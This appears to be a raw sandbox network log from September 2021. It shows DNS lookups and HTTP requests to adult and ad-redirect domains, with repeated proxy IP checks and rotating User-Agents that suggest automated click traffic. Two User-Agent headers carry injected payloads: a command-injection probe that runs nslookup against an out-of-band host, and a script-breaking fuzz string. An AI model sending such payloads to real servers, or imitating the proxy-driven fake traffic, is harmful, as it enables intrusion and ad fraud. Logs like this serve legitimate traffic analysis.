User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:53:00 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
GEThttp://momav.us/index.htmRequestGET /index.htm HTTP/1.1
Host: momav.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; LLD-L31 Build/HONORLLD-L31; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36 GSA/9.61.9.21.arm64
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:59 GMT
Content-Type: text/html
Content-Length: 281
Last-Modified: Sat, 20 Mar 2021 12:45:19 GMT
Connection: keep-alive
ETag: "6055ee5f-119"
Accept-Ranges: bytes
-
GEThttp://beautyhealth.cc/index.htmlRequestGET /index.html HTTP/1.1
Host: beautyhealth.cc
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9895 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:59 GMT
Content-Type: text/html
Content-Length: 373
Last-Modified: Fri, 27 Aug 2021 02:13:19 GMT
Connection: keep-alive
ETag: "61284a3f-175"
Accept-Ranges: bytes
-
GEThttp://789ff.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: 789ff.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2444.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://yaojav.com/adv.htmlRequestGET /adv.html HTTP/1.1
Host: yaojav.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://freejav.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: freejav.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A172.67.75.150monitor.capmonster.appIN A104.26.2.167
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:05 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSxnxxxx.ruRequestxnxxxx.ruIN AResponsexnxxxx.ruIN A2.57.89.186
-
DNSd2fbvay81k4ji3.cloudfront.netRequestd2fbvay81k4ji3.cloudfront.netIN AResponsed2fbvay81k4ji3.cloudfront.netIN A13.227.211.86d2fbvay81k4ji3.cloudfront.netIN A13.227.211.155d2fbvay81k4ji3.cloudfront.netIN A13.227.211.61d2fbvay81k4ji3.cloudfront.netIN A13.227.211.90
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSadmin.bitninja.ioRequestadmin.bitninja.ioIN AResponseadmin.bitninja.ioIN CNAMEapi.bitninja.ioapi.bitninja.ioIN A148.72.132.217api.bitninja.ioIN A148.72.132.216api.bitninja.ioIN A148.72.132.201api.bitninja.ioIN A148.72.132.215
-
DNSxxx5.plive.xyzRequestxxx5.plive.xyzIN AResponsexxx5.plive.xyzIN CNAMEplive.xyzplive.xyzIN A194.59.164.58
-
DNSwww.onlinecasinoground.nlRequestwww.onlinecasinoground.nlIN AResponsewww.onlinecasinoground.nlIN A172.67.72.99www.onlinecasinoground.nlIN A104.26.1.78www.onlinecasinoground.nlIN A104.26.0.78
-
DNSlangke.funRequestlangke.funIN AResponselangke.funIN A212.107.18.203
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627545&t=19e03a4328d2b47d&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627545&t=19e03a4328d2b47d&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627545
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:53:06 GMT
Location: https://bongacams7.com/track?v=2&c=602941
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://d2fbvay81k4ji3.cloudfront.net/?avbfd=930894RequestGET /?avbfd=930894 HTTP/1.1
Host: d2fbvay81k4ji3.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Linux; Android 6.0; LG-K350 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/46.0.2490.76 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/159.0.0.38.95;]
Accept: */*
Referer: http://weightlose.tw/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Length: 48641
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:53:06 GMT
access-control-allow-origin: *
Cache-Control: no-store, no-cache, proxy-revalidate, must-revalidate, private, no-transform
Content-Encoding: gzip
Pragma: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 ec5c4a66c1200ddcc562c6e98f77a48d.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: fxx3Xaj5vdUxtyz5fVtvoOI4YgdKJ5H0SAoxr_L0vuF4g-1ndgBfzQ==
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:06 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:06 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSiir.aiRequestiir.aiIN AResponseiir.aiIN A104.21.1.54iir.aiIN A172.67.128.142
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSxxxhub.usRequestxxxhub.usIN AResponsexxxhub.usIN A207.180.237.38
-
DNSmasde.infoRequestmasde.infoIN AResponsemasde.infoIN A212.107.18.203
-
DNSxxxlist.usRequestxxxlist.usIN AResponsexxxlist.usIN A167.86.121.34
-
DNSefreecode.comRequestefreecode.comIN AResponseefreecode.comIN A18.208.5.78
-
DNSlovekiss.xyzRequestlovekiss.xyzIN AResponselovekiss.xyzIN A207.180.237.38
-
GEThttp://xxxhub.us/goadv.phpRequestGET /goadv.php HTTP/1.1
Host: xxxhub.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; Touch; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A104.21.52.2nsparket.topIN A172.67.192.135
-
GEThttp://pornhub.bid/adv.phpRequestGET /adv.php HTTP/1.1
Host: pornhub.bid
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'"`0&nslookup xlmq45hd8kx3yek5qx3wa8fszj5iv6sunhd52.b.inty.io.&`'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://xxxlist.us/index.htmRequestGET /index.htm HTTP/1.1
Host: xxxlist.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:11 GMT
Content-Type: text/html
Content-Length: 265
Last-Modified: Mon, 02 Aug 2021 08:02:53 GMT
Connection: keep-alive
ETag: "6107a6ad-109"
Accept-Ranges: bytes
-
GEThttp://lovekiss.xyz/adv.phpRequestGET /adv.php HTTP/1.1
Host: lovekiss.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_2 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B202 [FBAN/FBIOS;FBAV/161.0.0.47.95;FBBV/94302063;FBDV/iPhone7,2;FBMD/iPhone;FBSN/iOS;FBSV/11.1.2;FBSS/2;FBCR/NOS;FBID/phone;FBLC/pt_PT;FBOP/5;FBRV/95966709]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://nsparket.top/redirect?tid=922613RequestGET /redirect?tid=922613 HTTP/1.1
Host: nsparket.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://hubtube.ru/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:53:12 GMT
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
cache-control: no-store, no-cache, must-revalidate, no-transform
pragma: no-cache
p3p: CP="NID DSP ALL COR"
set-cookie: csu=43ad4eb1-94ef-4b6e-bf1f-b8f5c85ee1a0
location: https://xml.bid-engine.com/click?i=kfJCLuRN6cc_0
x-cache: Miss from cloudfront
via: 1.1 ff34f581ad0f4009e4c404975952e7f0.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS50-C1
x-amz-cf-id: _k6IM-nr1-GOr3jR831SuJoYpzh3MuFZ62l24grfFWWVu_DDtxYQhQ==
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tKxP60VxhUvL14waHZ2mky8uaHvKYwPpXa%2FGXGhJpeRXicQq6HFur5Wv5gthKPY97wG9IbM%2FFKlJ1n6SLXW9ZlGyBF%2FxYhpVI%2BI%2FJywSe%2ByHP6uLFgB8FfVjGixzh%2Fk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6cf11df331eb5-AMS
alt-svc: h2=":443"; ma=60
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:15 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:18 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSqihuu.netRequestqihuu.netIN AResponseqihuu.netIN A5.181.218.143
-
DNS789ff.liveRequest789ff.liveIN AResponse789ff.liveIN A212.107.18.203
-
DNSyesdd.ruRequestyesdd.ruIN AResponseyesdd.ruIN A212.107.18.203
-
DNSxxxlist.usRequestxxxlist.usIN AResponsexxxlist.usIN A167.86.121.34
-
GEThttp://xxxlist.us/index.htmRequestGET /index.htm HTTP/1.1
Host: xxxlist.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:18 GMT
Content-Type: text/html
Content-Length: 265
Last-Modified: Mon, 02 Aug 2021 08:02:53 GMT
Connection: keep-alive
ETag: "6107a6ad-109"
Accept-Ranges: bytes
-
GEThttp://sex.sexy-wife.com/ungads.phpRequestGET /ungads.php HTTP/1.1
Host: sex.sexy-wife.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSupdate.googleapis.comRequestupdate.googleapis.comIN AResponseupdate.googleapis.comIN A142.250.179.195
-
DNSmorenews.usRequestmorenews.usIN AResponsemorenews.usIN A207.180.237.38
-
DNSonsanothi.bizRequestonsanothi.bizIN AResponseonsanothi.bizIN A52.222.139.29onsanothi.bizIN A52.222.139.93onsanothi.bizIN A52.222.139.9onsanothi.bizIN A52.222.139.108
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A104.21.52.2nsparket.topIN A172.67.192.135
-
DNSftube.xyzRequestftube.xyzIN AResponseftube.xyzIN A212.107.19.136
-
DNSdigitalmedium.xyzRequestdigitalmedium.xyzIN AResponsedigitalmedium.xyzIN A207.180.237.38
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSteentube.usRequestteentube.usIN AResponseteentube.usIN A167.86.121.34
-
DNSsexybride.xyzRequestsexybride.xyzIN AResponsesexybride.xyzIN A194.59.164.58
-
DNSwww.onlinecasinoground.nlRequestwww.onlinecasinoground.nlIN AResponsewww.onlinecasinoground.nlIN A172.67.72.99www.onlinecasinoground.nlIN A104.26.1.78www.onlinecasinoground.nlIN A104.26.0.78
-
GEThttp://morenews.us/index.htmlRequestGET /index.html HTTP/1.1
Host: morenews.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Lenovo YT3-X50F Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.123 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:22 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Thu, 26 Aug 2021 08:28:46 GMT
Connection: keep-alive
ETag: "612750be-108"
Accept-Ranges: bytes
-
GEThttp://digitalmedium.xyz/index.htmlRequestGET /index.html HTTP/1.1
Host: digitalmedium.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0s6qso;//';//";//%>?>zzrfp'/"<wz232
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:22 GMT
Content-Type: text/html
Content-Length: 90
Last-Modified: Tue, 06 Jul 2021 04:22:21 GMT
Connection: keep-alive
ETag: "60e3da7d-5a"
Accept-Ranges: bytes
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627598&t=e42aa6fe6707ac87&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627598&t=e42aa6fe6707ac87&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627598
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:53:23 GMT
Location: https://www.fpcpopunder.com/popunder/popunder.cgi?program=light&account=pub_fpc_popcash&track=A
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://teentube.us/index.htmlRequestGET /index.html HTTP/1.1
Host: teentube.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:23 GMT
Content-Type: text/html
Content-Length: 242
Last-Modified: Mon, 07 Jun 2021 06:25:53 GMT
Connection: keep-alive
ETag: "60bdbbf1-f2"
Accept-Ranges: bytes
-
GEThttp://onsanothi.biz/redirect?tid=929274RequestGET /redirect?tid=929274 HTTP/1.1
Host: onsanothi.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0.2 Waterfox/40.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xnude.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=4c72b627-8be9-42c7-b2ad-78432417c01f
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:53:23 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
Location: http://s.optnx.com/cimp.php?data=TVRZek1Ea3lNakF3TTN3eE9EQXpOV014TkRNeU1Ua3hNMkkwWVRsaVl6ZG1NamhtTkRJek16UTJOQS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz14bnVkZSx1cyxpbmRleCxodG1sJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablN1cGxkSzZWMHJxcmJYU3VsZEs2WjBycFhTdWxkTTZWMHJwWFRhYVUyVWNTMlc2OFhWeTEyWjFiUzE2MFQyVjdXMjZadXR0c211MXJ6cTB6dHVucW4zbWxsM3V6cHBwc3p6bHNzZGRQZFBaUzVRRDdieG5LNXpwWFN1bGRLNlYwcnBYU3VsY0gyQS18aHR0cHwxNTQuNjEuNzEuNTF8VVNBfDQxfGFkLW1hdmVuLmNvbXw1MzEyOTR8NDMwNjc1fDgxNjI2MXwzNTc2NDExfDUwOHw0NTcwMDA2fDU4OTE5MDE0fDQwfDB8MHwwfDU4OHw5MjkyNzR8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDFiYjQ3M2YwNzhjZjk2MDY3YTVkMDZjMzI3NmQ4OGJhfDg4NzE5YzZhNWJhODkyNTJlMTAwZTlhNDQ0N2FhMDc3fDF8MHx4bnVkZS51c3wwfDB8MHwwLjEyfDF8MHxleGNoYW5nZV9saW5rfDB8MHwwfC0xfDB8MHx8fDJ8NzIwfHwwfDB8MHwwfDB8MHwxfDB8T0t8MWMxZjBkZjk2ZGRjMjI5Njc1MjNkNDYyZDM2YTUxZGQ-
X-Cache: Miss from cloudfront
Via: 1.1 415e8d76bf2c69e5e03b89ba8461cd7e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS50-C1
X-Amz-Cf-Id: DB5lEjkviJlpeOmFUjWZnBRQi0CSn5xhsb_JDHXrTjuBZeS1vARPBw==
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:26 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSjpteen.usRequestjpteen.usIN A
-
DNSjpteen.usRequestjpteen.usIN A
-
DNSjpteen.usRequestjpteen.usIN A
-
DNSjpteen.usRequestjpteen.usIN A
-
DNSjpteen.usRequestjpteen.usIN A
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A13.226.155.21nkwintenc.bizIN A13.226.155.74nkwintenc.bizIN A13.226.155.122nkwintenc.bizIN A13.226.155.26
-
DNSxml.bid-engine.comRequestxml.bid-engine.comIN AResponsexml.bid-engine.comIN CNAMEad-maven.xml.ak-is2.netad-maven.xml.ak-is2.netIN A198.134.116.29
-
DNSmaoss.infoRequestmaoss.infoIN AResponsemaoss.infoIN A5.181.218.143
-
GEThttp://alfad.pro/go/266933/617038RequestGET /go/266933/617038 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://x.hubtube.ru/ungx.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:53:28 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 312
Connection: keep-alive
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:31 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
GEThttp://searchengineads.net/ask?channel=2021ask831RequestGET /ask?channel=2021ask831 HTTP/1.1
Host: searchengineads.net
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 301 Moved Permanently
Date: Mon, 06 Sep 2021 09:53:32 GMT
Server: Apache
Location: https://searchengineads.net/ask?channel=2021ask831
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:33 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
